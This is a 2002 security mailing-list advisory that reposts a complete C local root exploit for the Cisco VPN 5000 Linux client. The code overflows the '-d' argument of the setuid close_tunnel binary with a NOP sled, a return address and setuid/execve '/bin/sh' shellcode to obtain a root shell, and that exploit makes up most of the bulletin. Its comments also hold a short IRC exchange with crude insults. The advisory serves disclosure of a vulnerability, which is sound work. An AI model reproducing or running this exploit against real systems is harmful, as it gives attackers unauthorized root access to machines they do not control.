[EXPL] Local Root Exploit for Cisco VPN 5000 Client

From: support@securiteam.com
Date: 09/23/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 23 Sep 2002 19:12:47 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Local Root Exploit for Cisco VPN 5000 Client
------------------------------------------------------------------------

SUMMARY

As we reported in our previous article:
<http://www.securiteam.com/securitynews/5PP0A2A8BA.html> Cisco VPN 5000
Client Multiple Vulnerabilities, a vulnerability in the program allows
local attackers to gain elevated privileges by causing the program to
overflow an internal buffer followed by the execution of arbitrary code
(as supplied by the user).

DETAILS

Exploit:
/*
* [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
* (C) BrainStorm - 2002
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb) i r
* eax 0xffffffff -1
* ecx 0x0 0
* edx 0x0 0
* ebx 0x4015c154 1075167572
* esp 0xbfffdb70 0xbfffdb70
* ebp 0x41414141 0x41414141
* esi 0x400168e4 1073834212
* edi 0xbfffdbf4 -1073751052
* eip 0x41414141 0x41414141
* eflags 0x10286 66182
*
* as you can see %eip got filled with 0x41 ;)
*
* tested:
* - on release 5.1.5
* - from package: vpn-5000-linux-5.1.5-des-k8.tar.Z
* - system RedHat Linux 7.2 / x86
*
* Bug Information:
* There are multiple unchecked buffers in the code which allow
* arbitrary code to be executed with root privileges.
* this is due to insufficient bounds checking.
* the result is a classic command line buffer overflow condition.
* This should be exploitable on Linux/Solaris.
*
* IRC:
* <BrainStor> a standard cmd line buffer overflow in the -d option
* <BrainStor> close_tunnel is set +s by default
* <v0id> tsk tsk tsk, cisco making errors like that
* <v0id> fucking stupid cunts
* <BrainStor> yea
* <BrainStor> its ubeliveable
* <v0id> man, standard buffer overflow should be practiclly non existant
these days
* <v0id> oh well
* <BrainStor> indeed
* <BrainStor> but its good tho ;)
*/

#include <stdio.h>
#include <unistd.h>

#define B 2504
#define N 0x90
#define R 0xbfffefc0 // may needs to be changed deppending on the
distro/os..
#define BIN "/bin/close_tunnel" // you maybe want to change this too =P
// /usr/local/bin/close_tunnel or so..
char shell[] = "HELO" // yes this is a valid x86 instruction ;)
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid();
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv[])
{
  int ret, off, es;
  
  char bof[B];
  
  printf("\n\n");
  printf(" [ElectronicSouls] \n");
  printf(" Cisco VPN 5000 client exploit \n");
  printf(" (C) BrainStorm \n\n");
  
  if(argv[1] == NULL) {
    off = 0;
    ret = R; }
  
  else {
    off = atoi(argv[1]);
    ret = atoi(argv[2])+off; }
  
  for (es = 0; es < B; es += 4 )
    *(long *) &bof[es] = ret;
  
  printf("+ return address: 0x%lx \n",ret);
  
  for (es = 0; es < (B - strlen(shell) - 36); ++es)
    *(bof+es) = N;
  
  memcpy(bof+es, shell, strlen(shell));
  
  printf("+ overflowing the buffer..\n\n\n");
  
  execl(BIN,BIN,"-d",bof,0); // b00m!
  
  return(0);
}

ADDITIONAL INFORMATION

The information has been provided by
<mailto:brainstorm@ElectronicSouls.zzn.com> Brain Storm.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Quantcast